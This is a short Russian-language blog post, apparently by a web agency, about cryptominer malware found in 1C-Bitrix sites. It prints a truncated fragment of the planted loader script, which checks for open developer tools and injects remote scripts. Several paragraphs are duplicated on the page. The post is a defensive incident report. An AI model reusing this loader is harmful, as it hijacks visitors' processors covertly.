Вирусы-майнеры на сайтах
За последние несколько месяцев выросло количество сайтов на платформе 1С-Битрикс "Управление сайтом" зараженных вирусами-майнерами.
Всё началось с того, что к нам обратился наш клиент, которому стали поступать от посетителей жалобы на 100% загруженность процессора при посещении сайта. Причем майнер активизировался только на macbook'ах в хроме. На других проектах, где мы встретили данный вирус он работал во всех браузерах.
Мы начали анализировать ситуацию и очень быстро нашли файлы /bitrix/js/main/core/core_loader.js и /bitrix/js/main/core/core_tasker.js
Примерное содержимое:
Данный файл просто удалили. Откуда он появился и как его загрузили на сайт - установить не удалось. Ситуацию взяли на контроль, но скрипт больше не появлялся.
Мы будем искать проблему дальше. Если Вы столкнулись с такой же уязвимостью - Вы уже знаете что делать.
Мы начали анализировать ситуацию и очень быстро нашли файлы /bitrix/js/main/core/core_loader.js и /bitrix/js/main/core/core_tasker.js
Примерное содержимое:
;(function(window){ window.jssassin = window.jssassin || { config: { instpDelay: 400, startDelay: 1600 }, state: { scriptsNotLoad: 0, init: false }, proc: { start: function(){}, destroy: function(){} }, inspInterval: undefined, init: function ( scripts, start, destroy ) { if (this.state.init) return; this.state.init = true; var self = this; this.checkDevtoolsByConsoleInit(); if (this.isDangerous()) return; if (typeof start == "function") this.proc.start = start; if (typeof destroy == "function") this.proc.destroy = destroy; this.state.scriptsNotLoad = scripts.length; if (this.state.scriptsNotLoad > 0) { scripts.forEach(function(src) { var script = document.createElement('script'); script.src = src; script.async = false; script.onload = function () {self.onloadScript(script)}; document.head.appendChild(script); }); return; }
Данный файл просто удалили. Откуда он появился и как его загрузили на сайт - установить не удалось. Ситуацию взяли на контроль, но скрипт больше не появлялся.
Мы будем искать проблему дальше. Если Вы столкнулись с такой же уязвимостью - Вы уже знаете что делать.